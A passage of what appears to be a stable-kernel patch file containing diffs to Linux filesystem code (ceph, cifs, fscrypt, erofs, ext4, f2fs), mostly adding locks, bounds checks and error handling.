+-				     int (*cb)(struct inode *,
+-					       struct ceph_cap *, void *),
++				     int (*cb)(struct inode *, int mds, void *),
+ 				     void *arg);
+ extern void ceph_mdsc_pre_umount(struct ceph_mds_client *mdsc);
+ 
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 3599fefa91f99..478b741b11075 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -1190,6 +1190,8 @@ extern void ceph_kick_flushing_caps(struct ceph_mds_client *mdsc,
+ 				    struct ceph_mds_session *session);
+ void ceph_kick_flushing_inode_caps(struct ceph_mds_session *session,
+ 				   struct ceph_inode_info *ci);
++extern struct ceph_cap *__get_cap_for_mds(struct ceph_inode_info *ci,
++					  int mds);
+ extern struct ceph_cap *ceph_get_cap_for_mds(struct ceph_inode_info *ci,
+ 					     int mds);
+ extern void ceph_take_cap_refs(struct ceph_inode_info *ci, int caps,
+diff --git a/fs/cifs/cifs_debug.c b/fs/cifs/cifs_debug.c
+index 4952a94e5272d..e41154ad96afc 100644
+--- a/fs/cifs/cifs_debug.c
++++ b/fs/cifs/cifs_debug.c
+@@ -279,8 +279,10 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
+ 			c, server->conn_id);
+ 
++		spin_lock(&server->srv_lock);
+ 		if (server->hostname)
+ 			seq_printf(m, "Hostname: %s ", server->hostname);
++		spin_unlock(&server->srv_lock);
+ #ifdef CONFIG_CIFS_SMB_DIRECT
+ 		if (!server->rdma)
+ 			goto skip_rdma;
+@@ -607,10 +609,13 @@ static int cifs_stats_proc_show(struct seq_file *m, void *v)
+ 				server->fastest_cmd[j],
+ 				server->slowest_cmd[j]);
+ 		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			if (atomic_read(&server->smb2slowcmd[j]))
++			if (atomic_read(&server->smb2slowcmd[j])) {
++				spin_lock(&server->srv_lock);
+ 				seq_printf(m, "  %d slow responses from %s for command %d\n",
+ 					atomic_read(&server->smb2slowcmd[j]),
+ 					server->hostname, j);
++				spin_unlock(&server->srv_lock);
++			}
+ #endif /* STATS2 */
+ 		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+ 			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+diff --git a/fs/cifs/cifs_debug.h b/fs/cifs/cifs_debug.h
+index d44808263cfba..ce5cfd236fdb8 100644
+--- a/fs/cifs/cifs_debug.h
++++ b/fs/cifs/cifs_debug.h
+@@ -81,19 +81,19 @@ do {									\
+ 
+ #define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
+ do {									\
+-	const char *sn = "";						\
+-	if (server && server->hostname)					\
+-		sn = server->hostname;					\
++	spin_lock(&server->srv_lock);					\
+ 	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+ 		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
+-				      __FILE__, sn, ##__VA_ARGS__);	\
++				      __FILE__, server->hostname,	\
++				      ##__VA_ARGS__);			\
+ 	} else if ((type) & VFS) {					\
+ 		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
+-				    sn, ##__VA_ARGS__);			\
++				    server->hostname, ##__VA_ARGS__);	\
+ 	} else if ((type) & NOISY && (NOISY != 0)) {			\
+ 		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
+-				      sn, ##__VA_ARGS__);		\
++				      server->hostname, ##__VA_ARGS__);	\
+ 	}								\
++	spin_unlock(&server->srv_lock);					\
+ } while (0)
+ 
+ #define cifs_server_dbg(type, fmt, ...)					\
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 077c88c49dfdf..21b31d1640e57 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -452,8 +452,10 @@ static int __reconnect_target_unlocked(struct TCP_Server_Info *server, const cha
+ 		if (server->hostname != target) {
+ 			hostname = extract_hostname(target);
+ 			if (!IS_ERR(hostname)) {
++				spin_lock(&server->srv_lock);
+ 				kfree(server->hostname);
+ 				server->hostname = hostname;
++				spin_unlock(&server->srv_lock);
+ 			} else {
+ 				cifs_dbg(FYI, "%s: couldn't extract hostname or address from dfs target: %ld\n",
+ 					 __func__, PTR_ERR(hostname));
+@@ -620,9 +622,7 @@ cifs_echo_request(struct work_struct *work)
+ 		goto requeue_echo;
+ 
+ 	rc = server->ops->echo ? server->ops->echo(server) : -ENOSYS;
+-	if (rc)
+-		cifs_dbg(FYI, "Unable to send echo request to server: %s\n",
+-			 server->hostname);
++	cifs_server_dbg(FYI, "send echo request: rc = %d\n", rc);
+ 
+ 	/* Check witness registrations */
+ 	cifs_swn_check();
+@@ -1462,6 +1462,8 @@ static int match_server(struct TCP_Server_Info *server, struct smb3_fs_context *
+ {
+ 	struct sockaddr *addr = (struct sockaddr *)&ctx->dstaddr;
+ 
++	lockdep_assert_held(&server->srv_lock);
++
+ 	if (ctx->nosharesock)
+ 		return 0;
+ 
+@@ -1863,7 +1865,9 @@ cifs_setup_ipc(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	if (tcon == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock(&server->srv_lock);
+ 	scnprintf(unc, sizeof(unc), "\\\\%s\\IPC$", server->hostname);
++	spin_unlock(&server->srv_lock);
+ 
+ 	xid = get_xid();
+ 	tcon->ses = ses;
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 6f5fbbbebec33..158a0a5f40071 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5087,6 +5087,8 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	int rc = 0;
+ 	bool purge_cache = false;
++	struct cifs_deferred_close *dclose;
++	bool is_deferred = false;
+ 
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+@@ -5122,6 +5124,20 @@ void cifs_oplock_break(struct work_struct *work)
+ 		cifs_dbg(VFS, "Push locks rc = %d\n", rc);
+ 
+ oplock_break_ack:
++	/*
++	 * When oplock break is received and there are no active
++	 * file handles but cached, then schedule deferred close immediately.
++	 * So, new open will not use cached handle.
++	 */
++	spin_lock(&CIFS_I(inode)->deferred_lock);
++	is_deferred = cifs_is_deferred_close(cfile, &dclose);
++	spin_unlock(&CIFS_I(inode)->deferred_lock);
++
++	if (!CIFS_CACHE_HANDLE(cinode) && is_deferred &&
++			cfile->deferred_close_scheduled && delayed_work_pending(&cfile->deferred)) {
++		cifs_close_deferred_file(cinode);
++	}
++
+ 	/*
+ 	 * releasing stale oplock after recent reconnect of smb session using
+ 	 * a now incorrect file handle is not a data integrity issue but do
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index cf19e6a81ed99..31e06133acc3d 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -742,7 +742,9 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	list_for_each_entry(cfile, &cifs_inode->openFileList, flist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&cifs_inode->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&cifs_inode->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -755,7 +757,7 @@ cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode)
+ 	spin_unlock(&cifs_inode->open_file_lock);
+ 
+ 	list_for_each_entry_safe(tmp_list, tmp_next_list, &file_head, list) {
+-		_cifsFileInfo_put(tmp_list->cfile, true, false);
++		_cifsFileInfo_put(tmp_list->cfile, false, false);
+ 		list_del(&tmp_list->list);
+ 		kfree(tmp_list);
+ 	}
+@@ -773,7 +775,9 @@ cifs_close_all_deferred_files(struct cifs_tcon *tcon)
+ 	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+ 		if (delayed_work_pending(&cfile->deferred)) {
+ 			if (cancel_delayed_work(&cfile->deferred)) {
++				spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 				cifs_del_deferred_close(cfile);
++				spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 				tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 				if (tmp_list == NULL)
+@@ -808,7 +812,9 @@ cifs_close_deferred_file_under_dentry(struct cifs_tcon *tcon, const char *path)
+ 		if (strstr(full_path, path)) {
+ 			if (delayed_work_pending(&cfile->deferred)) {
+ 				if (cancel_delayed_work(&cfile->deferred)) {
++					spin_lock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 					cifs_del_deferred_close(cfile);
++					spin_unlock(&CIFS_I(d_inode(cfile->dentry))->deferred_lock);
+ 
+ 					tmp_list = kmalloc(sizeof(struct file_list), GFP_ATOMIC);
+ 					if (tmp_list == NULL)
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index c47b254f0d1e2..81be17845072a 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -159,6 +159,7 @@ cifs_chan_is_iface_active(struct cifs_ses *ses,
+ /* returns number of channels added */
+ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ {
++	struct TCP_Server_Info *server = ses->server;
+ 	int old_chan_count, new_chan_count;
+ 	int left;
+ 	int rc = 0;
+@@ -178,16 +179,16 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 		return 0;
+ 	}
+ 
+-	if (ses->server->dialect < SMB30_PROT_ID) {
++	if (server->dialect < SMB30_PROT_ID) {
+ 		spin_unlock(&ses->chan_lock);
+ 		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
+ 		return 0;
+ 	}
+ 
+-	if (!(ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
+ 		ses->chan_max = 1;
+ 		spin_unlock(&ses->chan_lock);
+-		cifs_dbg(VFS, "server %s does not support multichannel\n", ses->server->hostname);
++		cifs_server_dbg(VFS, "no multichannel support\n");
+ 		return 0;
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index ab59faf8a06a7..537e8679900b8 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -175,8 +175,17 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 		}
+ 	}
+ 	spin_unlock(&tcon->tc_lock);
+-	if ((!tcon->ses) || (tcon->ses->ses_status == SES_EXITING) ||
+-	    (!tcon->ses->server) || !server)
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return -EIO;
++	}
++	spin_unlock(&ses->ses_lock);
++	if (!ses->server || !server)
+ 		return -EIO;
+ 
+ 	spin_lock(&server->srv_lock);
+@@ -204,8 +213,6 @@ again:
+ 	if (rc)
+ 		return rc;
+ 
+-	ses = tcon->ses;
+-
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+ 		spin_unlock(&ses->chan_lock);
+diff --git a/fs/crypto/inline_crypt.c b/fs/crypto/inline_crypt.c
+index cea8b14007e6a..8bfb3ce864766 100644
+--- a/fs/crypto/inline_crypt.c
++++ b/fs/crypto/inline_crypt.c
+@@ -12,7 +12,7 @@
+  * provides the key and IV to use.
+  */
+ 
+-#include <linux/blk-crypto-profile.h>
++#include <linux/blk-crypto.h>
+ #include <linux/blkdev.h>
+ #include <linux/buffer_head.h>
+ #include <linux/sched/mm.h>
+@@ -77,10 +77,8 @@ static void fscrypt_log_blk_crypto_impl(struct fscrypt_mode *mode,
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < num_devs; i++) {
+-		struct request_queue *q = bdev_get_queue(devs[i]);
+-
+ 		if (!IS_ENABLED(CONFIG_BLK_INLINE_ENCRYPTION_FALLBACK) ||
+-		    __blk_crypto_cfg_supported(q->crypto_profile, cfg)) {
++		    blk_crypto_config_supported_natively(devs[i], cfg)) {
+ 			if (!xchg(&mode->logged_blk_crypto_native, 1))
+ 				pr_info("fscrypt: %s using blk-crypto (native)\n",
+ 					mode->friendly_name);
+@@ -139,8 +137,7 @@ int fscrypt_select_encryption_impl(struct fscrypt_info *ci)
+ 		return PTR_ERR(devs);
+ 
+ 	for (i = 0; i < num_devs; i++) {
+-		if (!blk_crypto_config_supported(bdev_get_queue(devs[i]),
+-						 &crypto_cfg))
++		if (!blk_crypto_config_supported(devs[i], &crypto_cfg))
+ 			goto out_free_devs;
+ 	}
+ 
+@@ -184,8 +181,7 @@ int fscrypt_prepare_inline_crypt_key(struct fscrypt_prepared_key *prep_key,
+ 		goto fail;
+ 	}
+ 	for (i = 0; i < num_devs; i++) {
+-		err = blk_crypto_start_using_key(blk_key,
+-						 bdev_get_queue(devs[i]));
++		err = blk_crypto_start_using_key(devs[i], blk_key);
+ 		if (err)
+ 			break;
+ 	}
+@@ -224,7 +220,7 @@ void fscrypt_destroy_inline_crypt_key(struct super_block *sb,
+ 	devs = fscrypt_get_devices(sb, &num_devs);
+ 	if (!IS_ERR(devs)) {
+ 		for (i = 0; i < num_devs; i++)
+-			blk_crypto_evict_key(bdev_get_queue(devs[i]), blk_key);
++			blk_crypto_evict_key(devs[i], blk_key);
+ 		kfree(devs);
+ 	}
+ 	kfree_sensitive(blk_key);
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index e51f27b6bde15..340bd56a57559 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -154,6 +154,7 @@ struct erofs_sb_info {
+ 
+ 	/* what we really care is nid, rather than ino.. */
+ 	erofs_nid_t root_nid;
++	erofs_nid_t packed_nid;
+ 	/* used for statfs, f_files - f_favail */
+ 	u64 inos;
+ 
+@@ -310,7 +311,7 @@ struct erofs_inode {
+ 
+ 	unsigned char datalayout;
+ 	unsigned char inode_isize;
+-	unsigned short xattr_isize;
++	unsigned int xattr_isize;
+ 
+ 	unsigned int xattr_shared_count;
+ 	unsigned int *xattr_shared_xattrs;
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 626a615dafc2f..bd8bf8fc2f5df 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -381,17 +381,7 @@ static int erofs_read_superblock(struct super_block *sb)
+ #endif
+ 	sbi->islotbits = ilog2(sizeof(struct erofs_inode_compact));
+ 	sbi->root_nid = le16_to_cpu(dsb->root_nid);
+-#ifdef CONFIG_EROFS_FS_ZIP
+-	sbi->packed_inode = NULL;
+-	if (erofs_sb_has_fragments(sbi) && dsb->packed_nid) {
+-		sbi->packed_inode =
+-			erofs_iget(sb, le64_to_cpu(dsb->packed_nid));
+-		if (IS_ERR(sbi->packed_inode)) {
+-			ret = PTR_ERR(sbi->packed_inode);
+-			goto out;
+-		}
+-	}
+-#endif
++	sbi->packed_nid = le64_to_cpu(dsb->packed_nid);
+ 	sbi->inos = le64_to_cpu(dsb->inos);
+ 
+ 	sbi->build_time = le64_to_cpu(dsb->build_time);
+@@ -800,6 +790,16 @@ static int erofs_fc_fill_super(struct super_block *sb, struct fs_context *fc)
+ 
+ 	erofs_shrinker_register(sb);
+ 	/* sb->s_umount is already locked, SB_ACTIVE and SB_BORN are not set */
++#ifdef CONFIG_EROFS_FS_ZIP
++	if (erofs_sb_has_fragments(sbi) && sbi->packed_nid) {
++		sbi->packed_inode = erofs_iget(sb, sbi->packed_nid);
++		if (IS_ERR(sbi->packed_inode)) {
++			err = PTR_ERR(sbi->packed_inode);
++			sbi->packed_inode = NULL;
++			return err;
++		}
++	}
++#endif
+ 	err = erofs_init_managed_cache(sb);
+ 	if (err)
+ 		return err;
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 39cc014dba40c..bb91cc6499725 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -211,6 +211,10 @@ static int legacy_load_cluster_from_disk(struct z_erofs_maprecorder *m,
+ 		if (advise & Z_EROFS_VLE_DI_PARTIAL_REF)
+ 			m->partialref = true;
+ 		m->clusterofs = le16_to_cpu(di->di_clusterofs);
++		if (m->clusterofs >= 1 << vi->z_logical_clusterbits) {
++			DBG_BUGON(1);
++			return -EFSCORRUPTED;
++		}
+ 		m->pblk = le32_to_cpu(di->di_u.blkaddr);
+ 		break;
+ 	default:
+diff --git a/fs/ext4/extents.c b/fs/ext4/extents.c
+index 36225ef56b0cd..1bb55a6d79c23 100644
+--- a/fs/ext4/extents.c
++++ b/fs/ext4/extents.c
+@@ -5804,7 +5804,8 @@ int ext4_clu_mapped(struct inode *inode, ext4_lblk_t lclu)
+ 	 * mapped - no physical clusters have been allocated, and the
+ 	 * file has no extents
+ 	 */
+-	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA))
++	if (ext4_test_inode_state(inode, EXT4_STATE_MAY_INLINE_DATA) ||
++	    ext4_has_inline_data(inode))
+ 		return 0;
+ 
+ 	/* search for the extent closest to the first block in the cluster */
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index eea11ad84e680..42003b5c4cadc 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -3077,6 +3077,9 @@ static int ext4_da_write_end(struct file *file,
+ 	    ext4_has_inline_data(inode))
+ 		return ext4_write_inline_data_end(inode, pos, len, copied, page);
+ 
++	if (unlikely(copied < len) && !PageUptodate(page))
++		copied = 0;
++
+ 	start = pos & (PAGE_SIZE - 1);
+ 	end = start + copied - 1;
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 74d3f2d2271f3..b160863eca141 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -762,7 +762,12 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 
+ 	if (dic->clen > PAGE_SIZE * dic->nr_cpages - COMPRESS_HEADER_SIZE) {
+ 		ret = -EFSCORRUPTED;
+-		f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
++
++		/* Avoid f2fs_commit_super in irq context */
++		if (in_task)
++			f2fs_save_errors(sbi, ERROR_FAIL_DECOMPRESSION);
++		else
++			f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
+ 		goto out_release;
+ 	}
+ 
+@@ -1462,6 +1467,12 @@ continue_unlock:
+ 		if (!PageDirty(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
++		if (PageWriteback(cc->rpages[i])) {
++			if (wbc->sync_mode == WB_SYNC_NONE)
++				goto continue_unlock;
++			f2fs_wait_on_page_writeback(cc->rpages[i], DATA, true, true);
++		}
++
+ 		if (!clear_page_dirty_for_io(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index f92899bfcbd5e..770a606eb3f6a 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -858,6 +858,8 @@ void f2fs_submit_merged_ipu_write(struct f2fs_sb_info *sbi,
+ 	bool found = false;
+ 	struct bio *target = bio ? *bio : NULL;
+ 
++	f2fs_bug_on(sbi, !target && !page);
++
+ 	for (temp = HOT; temp < NR_TEMP_TYPE && !found; temp++) {
+ 		struct f2fs_bio_info *io = sbi->write_io[DATA] + temp;
+ 		struct list_head *head = &io->bio_list;
+@@ -2886,7 +2888,8 @@ out:
+ 
+ 	if (unlikely(f2fs_cp_error(sbi))) {
+ 		f2fs_submit_merged_write(sbi, DATA);
+-		f2fs_submit_merged_ipu_write(sbi, bio, NULL);
++		if (bio && *bio)
++			f2fs_submit_merged_ipu_write(sbi, bio, NULL);
+ 		submitted = NULL;
+ 	}
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 87664c309b3c8..4b44ca1decdd3 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3569,6 +3569,7 @@ int f2fs_quota_sync(struct super_block *sb, int type);
+ loff_t max_file_blocks(struct inode *inode);
+ void f2fs_quota_off_umount(struct super_block *sb);
+ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason);
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag);
+ void f2fs_handle_error(struct f2fs_sb_info *sbi, unsigned char error);
+ int f2fs_commit_super(struct f2fs_sb_info *sbi, bool recover);
+ int f2fs_sync_fs(struct super_block *sb, int sync);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 773b3ddc2cd72..bf37983304a33 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -2115,7 +2115,11 @@ static int f2fs_ioc_start_atomic_write(struct file *filp)
+ 		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 	} else {
+ 		/* Reuse the already created COW inode */
+-		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		ret = f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
+ 	}
+ 
+ 	f2fs_write_inode(inode, NULL);
+@@ -3004,15 +3008,16 @@ int f2fs_transfer_project_quota(struct inode *inode, kprojid_t kprojid)
+ 	struct dquot *transfer_to[MAXQUOTAS] = {};
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct super_block *sb = sbi->sb;
+-	int err = 0;
++	int err;
+ 
+ 	transfer_to[PRJQUOTA] = dqget(sb, make_kqid_projid(kprojid));
+-	if (!IS_ERR(transfer_to[PRJQUOTA])) {
+-		err = __dquot_transfer(inode, transfer_to);
+-		if (err)
+-			set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
+-		dqput(transfer_to[PRJQUOTA]);
+-	}
++	if (IS_ERR(transfer_to[PRJQUOTA]))
++		return PTR_ERR(transfer_to[PRJQUOTA]);
++
++	err = __dquot_transfer(inode, transfer_to);
++	if (err)
++		set_sbi_flag(sbi, SBI_QUOTA_NEED_REPAIR);
++	dqput(transfer_to[PRJQUOTA]);
+ 	return err;
+ }
+ 
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index ee6836478efe6..aa928d1c81597 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1792,8 +1792,8 @@ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control)
+ 				prefree_segments(sbi));
+ 
+ 	cpc.reason = __get_cp_reason(sbi);
+-	sbi->skipped_gc_rwsem = 0;
+ gc_more:
++	sbi->skipped_gc_rwsem = 0;
+ 	if (unlikely(!(sbi->sb->s_flags & SB_ACTIVE))) {
+ 		ret = -EINVAL;
+ 		goto stop;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 8d1e8c537daf0..b0fbdee16a96c 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -245,10 +245,16 @@ retry:
+ 	} else {
+ 		blkcnt_t count = 1;
+ 
++		err = inc_valid_block_count(sbi, inode, &count);
++		if (err) {
++			f2fs_put_dnode(&dn);
++			return err;
++		}
++
+ 		*old_addr = dn.data_blkaddr;
+ 		f2fs_truncate_data_blocks_range(&dn, 1);
+ 		dec_valid_block_count(sbi, F2FS_I(inode)->cow_inode, count);
+-		inc_valid_block_count(sbi, inode, &count);
++
+ 		f2fs_replace_block(sbi, &dn, dn.data_blkaddr, new_addr,
+ 					ni.version, true, false);
+ 	}
+@@ -4916,48 +4922,6 @@ int f2fs_check_write_pointer(struct f2fs_sb_info *sbi)
+ 	return 0;
+ }
+ 
+-static bool is_conv_zone(struct f2fs_sb_info *sbi, unsigned int zone_idx,
+-						unsigned int dev_idx)
+-{
+-	if (!bdev_is_zoned(FDEV(dev_idx).bdev))
+-		return true;
+-	return !test_bit(zone_idx, FDEV(dev_idx).blkz_seq);
+-}
+-
+-/* Return the zone index in the given device */
+-static unsigned int get_zone_idx(struct f2fs_sb_info *sbi, unsigned int secno,
+-					int dev_idx)
+-{
+-	block_t sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+-
+-	return (sec_start_blkaddr - FDEV(dev_idx).start_blk) >>
+-						sbi->log_blocks_per_blkz;
+-}
+-
+-/*
+- * Return the usable segments in a section based on the zone's
+- * corresponding zone capacity. Zone is equal to a section.
+- */
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(
+-		struct f2fs_sb_info *sbi, unsigned int segno)
+-{
+-	unsigned int dev_idx, zone_idx;
+-
+-	dev_idx = f2fs_target_device_index(sbi, START_BLOCK(sbi, segno));
+-	zone_idx = get_zone_idx(sbi, GET_SEC_FROM_SEG(sbi, segno), dev_idx);
+-
+-	/* Conventional zone's capacity is always equal to zone size */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->segs_per_sec;
+-
+-	if (!sbi->unusable_blocks_per_sec)
+-		return sbi->segs_per_sec;
+-
+-	/* Get the segment count beyond zone capacity block */
+-	return sbi->segs_per_sec - (sbi->unusable_blocks_per_sec >>
+-						sbi->log_blocks_per_seg);
+-}
+-
+ /*
+  * Return the number of usable blocks in a segment. The number of blocks
+  * returned is always equal to the number of blocks in a segment for
+@@ -4970,23 +4934,13 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(
+ 			struct f2fs_sb_info *sbi, unsigned int segno)
+ {
+ 	block_t seg_start, sec_start_blkaddr, sec_cap_blkaddr;
+-	unsigned int zone_idx, dev_idx, secno;
+-
+-	secno = GET_SEC_FROM_SEG(sbi, segno);
+-	seg_start = START_BLOCK(sbi, segno);
+-	dev_idx = f2fs_target_device_index(sbi, seg_start);
+-	zone_idx = get_zone_idx(sbi, secno, dev_idx);
+-
+-	/*
+-	 * Conventional zone's capacity is always equal to zone size,
+-	 * so, blocks per segment is unchanged.
+-	 */
+-	if (is_conv_zone(sbi, zone_idx, dev_idx))
+-		return sbi->blocks_per_seg;
++	unsigned int secno;
+ 
+ 	if (!sbi->unusable_blocks_per_sec)
+ 		return sbi->blocks_per_seg;
+ 
++	secno = GET_SEC_FROM_SEG(sbi, segno);
++	seg_start = START_BLOCK(sbi, segno);
+ 	sec_start_blkaddr = START_BLOCK(sbi, GET_SEG_FROM_SEC(sbi, secno));
+ 	sec_cap_blkaddr = sec_start_blkaddr + CAP_BLKS_PER_SEC(sbi);
+ 
+@@ -5020,11 +4974,6 @@ static inline unsigned int f2fs_usable_zone_blks_in_seg(struct f2fs_sb_info *sbi
+ 	return 0;
+ }
+ 
+-static inline unsigned int f2fs_usable_zone_segs_in_sec(struct f2fs_sb_info *sbi,
+-							unsigned int segno)
+-{
+-	return 0;
+-}
+ #endif
+ unsigned int f2fs_usable_blks_in_seg(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+@@ -5039,7 +4988,7 @@ unsigned int f2fs_usable_segs_in_sec(struct f2fs_sb_info *sbi,
+ 					unsigned int segno)
+ {
+ 	if (f2fs_sb_has_blkzoned(sbi))
+-		return f2fs_usable_zone_segs_in_sec(sbi, segno);
++		return CAP_SEGS_PER_SEC(sbi);
+ 
+ 	return sbi->segs_per_sec;
+ }
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index be8f2d7d007b9..cd65778fc9822 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -104,6 +104,9 @@ static inline void sanity_check_seg_type(struct f2fs_sb_info *sbi,
+ #define CAP_BLKS_PER_SEC(sbi)					\
+ 	((sbi)->segs_per_sec * (sbi)->blocks_per_seg -		\
+ 	 (sbi)->unusable_blocks_per_sec)
++#define CAP_SEGS_PER_SEC(sbi)					\
++	((sbi)->segs_per_sec - ((sbi)->unusable_blocks_per_sec >>\
++	(sbi)->log_blocks_per_seg))
+ #define GET_SEC_FROM_SEG(sbi, segno)				\
+ 	(((segno) == -1) ? -1: (segno) / (sbi)->segs_per_sec)
+ #define GET_SEG_FROM_SEC(sbi, secno)				\
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 14c87399efea2..5af05411818a5 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -3861,7 +3861,7 @@ void f2fs_handle_stop(struct f2fs_sb_info *sbi, unsigned char reason)
+ 	f2fs_up_write(&sbi->sb_lock);
+ }
+ 
+-static void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
++void f2fs_save_errors(struct f2fs_sb_info *sbi, unsigned char flag)
+ {
+ 	spin_lock(&sbi->error_lock);
+ 	if (!test_bit(flag, (unsigned long *)sbi->errors)) {
+diff --git a/fs/f2fs/sysfs.c b/fs/f2fs/sysfs.c
+index df27afd71ef48..3d68bfa75cf2a 100644
+--- a/fs/f2fs/sysfs.c
++++ b/fs/f2fs/sysfs.c
+@@ -550,9 +550,9 @@ out:
+ 	if (!strcmp(a->attr.name, "iostat_period_ms")) {
+ 		if (t < MIN_IOSTAT_PERIOD_MS || t > MAX_IOSTAT_PERIOD_MS)
+ 			return -EINVAL;
+-		spin_lock(&sbi->iostat_lock);
++		spin_lock_irq(&sbi->iostat_lock);
+ 		sbi->iostat_period_ms = (unsigned int)t;
